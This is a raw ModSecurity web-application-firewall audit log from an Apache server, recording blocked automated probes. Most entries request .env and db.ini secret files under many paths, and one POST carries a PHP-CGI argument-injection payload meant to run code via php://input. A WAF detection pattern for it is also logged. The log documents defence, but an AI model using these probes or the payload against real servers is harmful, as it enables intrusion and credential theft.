Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cde7061b-Z-- --3be9b765-A-- [23/Apr/2025:19:29:46 +0700] aAjdOtIw_rqnm4P5_aeEYAAAAEQ 103.236.140.4 49560 103.236.140.4 8181 --3be9b765-B-- GET /settings/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.108 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.108 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --3be9b765-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3be9b765-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745411386203893 747 (- - -) Stopwatch2: 1745411386203893 747; combined=319, p1=283, p2=0, p3=0, p4=0, p5=36, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3be9b765-Z-- --3240d63e-A-- [23/Apr/2025:19:29:47 +0700] aAjdO9Iw_rqnm4P5_aeEawAAAEI 103.236.140.4 49700 103.236.140.4 8181 --3240d63e-B-- GET /db.ini HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.108 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.108 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --3240d63e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3240d63e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||103.236.140.4|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745411387902059 2284 (- - -) Stopwatch2: 1745411387902059 2284; combined=787, p1=388, p2=370, p3=0, p4=0, p5=29, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3240d63e-Z-- --45331b61-A-- [23/Apr/2025:19:29:50 +0700] aAjdPhuwXEWV6ydgl51H2QAAAAE 103.236.140.4 49884 103.236.140.4 8181 --45331b61-B-- GET /docker/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.108 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.108 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --45331b61-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --45331b61-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745411390156247 631 (- - -) Stopwatch2: 1745411390156247 631; combined=248, p1=214, p2=0, p3=0, p4=0, p5=34, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --45331b61-Z-- --00c01a0a-A-- [23/Apr/2025:19:39:07 +0700] aAjfaz1ahuoJLEjKiAX6UwAAAI4 103.236.140.4 55582 103.236.140.4 8181 --00c01a0a-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.148.10.172 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.148.10.172 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0) Accept-Charset: utf-8 --00c01a0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --00c01a0a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745411947452103 1902 (- - -) Stopwatch2: 1745411947452103 1902; combined=330, p1=295, p2=0, p3=0, p4=0, p5=35, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00c01a0a-Z-- --5dbcf92c-A-- [23/Apr/2025:20:58:57 +0700] aAjyIRuwXEWV6ydgl512OQAAABI 103.236.140.4 51976 103.236.140.4 8181 --5dbcf92c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.227.231.159 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.227.231.159 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --5dbcf92c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5dbcf92c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745416737451701 873 (- - -) Stopwatch2: 1745416737451701 873; combined=386, p1=339, p2=0, p3=0, p4=0, p5=47, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5dbcf92c-Z-- --f96b637a-A-- [23/Apr/2025:21:00:07 +0700] aAjyZxuwXEWV6ydgl512mAAAABc 103.236.140.4 53032 103.236.140.4 8181 --f96b637a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.106 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:47.0) Gecko/20100101 Firefox/47.0 Accept-Charset: utf-8 --f96b637a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f96b637a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745416807132250 756 (- - -) Stopwatch2: 1745416807132250 756; combined=315, p1=277, p2=0, p3=0, p4=0, p5=38, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f96b637a-Z-- --4eb2012e-A-- [23/Apr/2025:21:08:02 +0700] aAj0QjI97BrbgvDq16RPdAAAAMU 103.236.140.4 33352 103.236.140.4 8181 --4eb2012e-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --4eb2012e-C-- --4eb2012e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4eb2012e-E-- --4eb2012e-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745417282777179 5288 (- - -) Stopwatch2: 1745417282777179 5288; combined=3706, p1=501, p2=3172, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4eb2012e-Z-- --af182907-A-- [23/Apr/2025:21:16:14 +0700] aAj2Lj1ahuoJLEjKiAUbwwAAAI0 103.236.140.4 40058 103.236.140.4 8181 --af182907-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.107 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --af182907-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --af182907-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745417774327819 726 (- - -) Stopwatch2: 1745417774327819 726; combined=257, p1=220, p2=0, p3=0, p4=0, p5=37, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af182907-Z-- --e0dc292b-A-- [23/Apr/2025:21:16:15 +0700] aAj2LzI97BrbgvDq16RQuwAAAMw 103.236.140.4 40068 103.236.140.4 8181 --e0dc292b-B-- GET /portal/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.107 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --e0dc292b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0dc292b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745417775038473 634 (- - -) Stopwatch2: 1745417775038473 634; combined=247, p1=214, p2=0, p3=0, p4=0, p5=33, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0dc292b-Z-- --0afdda78-A-- [23/Apr/2025:21:16:15 +0700] aAj2LxuwXEWV6ydgl517PAAAABI 103.236.140.4 40070 103.236.140.4 8181 --0afdda78-B-- GET /env/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.107 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --0afdda78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0afdda78-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745417775204336 762 (- - -) Stopwatch2: 1745417775204336 762; combined=335, p1=303, p2=0, p3=0, p4=0, p5=32, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0afdda78-Z-- --fbb29e23-A-- [23/Apr/2025:21:16:15 +0700] aAj2LxuwXEWV6ydgl517PQAAABU 103.236.140.4 40072 103.236.140.4 8181 --fbb29e23-B-- GET /api/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.107 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --fbb29e23-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fbb29e23-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745417775501491 632 (- - -) Stopwatch2: 1745417775501491 632; combined=256, p1=223, p2=0, p3=0, p4=0, p5=33, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fbb29e23-Z-- --91cfff69-A-- [23/Apr/2025:21:16:15 +0700] aAj2LxuwXEWV6ydgl517PgAAABg 103.236.140.4 40078 103.236.140.4 8181 --91cfff69-B-- GET /app/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.107 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --91cfff69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --91cfff69-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745417775667511 660 (- - -) Stopwatch2: 1745417775667511 660; combined=259, p1=225, p2=0, p3=0, p4=0, p5=34, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --91cfff69-Z-- --d2fb4e2f-A-- [23/Apr/2025:21:16:15 +0700] aAj2LxuwXEWV6ydgl517PwAAAAU 103.236.140.4 40080 103.236.140.4 8181 --d2fb4e2f-B-- GET /dev/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.107 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --d2fb4e2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d2fb4e2f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745417775903951 651 (- - -) Stopwatch2: 1745417775903951 651; combined=230, p1=193, p2=0, p3=0, p4=0, p5=37, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d2fb4e2f-Z-- --9bd86d1c-A-- [23/Apr/2025:21:16:16 +0700] aAj2MDI97BrbgvDq16RQvQAAAMs 103.236.140.4 40082 103.236.140.4 8181 --9bd86d1c-B-- GET /new/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.107 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --9bd86d1c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9bd86d1c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745417776069828 742 (- - -) Stopwatch2: 1745417776069828 742; combined=265, p1=219, p2=0, p3=0, p4=0, p5=46, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9bd86d1c-Z-- --32fbe004-A-- [23/Apr/2025:21:16:16 +0700] aAj2MBuwXEWV6ydgl517QAAAABE 103.236.140.4 40088 103.236.140.4 8181 --32fbe004-B-- GET /new/.env.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.107 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --32fbe004-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --32fbe004-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745417776346466 692 (- - -) Stopwatch2: 1745417776346466 692; combined=309, p1=275, p2=0, p3=0, p4=0, p5=34, sr=109, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --32fbe004-Z-- --bb91514a-A-- [23/Apr/2025:21:16:16 +0700] aAj2MBuwXEWV6ydgl517QQAAABY 103.236.140.4 40090 103.236.140.4 8181 --bb91514a-B-- GET /new/.env.production HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.107 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --bb91514a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb91514a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745417776512449 681 (- - -) Stopwatch2: 1745417776512449 681; combined=298, p1=266, p2=0, p3=0, p4=0, p5=32, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb91514a-Z-- --1d4e3524-A-- [23/Apr/2025:21:16:16 +0700] aAj2MBuwXEWV6ydgl517QgAAAAM 103.236.140.4 40092 103.236.140.4 8181 --1d4e3524-B-- GET /new/.env.staging HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.107 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --1d4e3524-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1d4e3524-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745417776697243 636 (- - -) Stopwatch2: 1745417776697243 636; combined=261, p1=230, p2=0, p3=0, p4=0, p5=31, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1d4e3524-Z-- --9a75514d-A-- [23/Apr/2025:21:16:18 +0700] aAj2MhuwXEWV6ydgl517SQAAAAA 103.236.140.4 40116 103.236.140.4 8181 --9a75514d-B-- GET /awstats/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.107 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --9a75514d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a75514d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745417778195449 660 (- - -) Stopwatch2: 1745417778195449 660; combined=269, p1=237, p2=0, p3=0, p4=0, p5=32, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a75514d-Z-- --fa18f33e-A-- [23/Apr/2025:21:16:18 +0700] aAj2MhuwXEWV6ydgl517SgAAAAE 103.236.140.4 40118 103.236.140.4 8181 --fa18f33e-B-- GET /conf/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.107 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --fa18f33e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa18f33e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745417778361461 613 (- - -) Stopwatch2: 1745417778361461 613; combined=251, p1=221, p2=0, p3=0, p4=0, p5=30, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
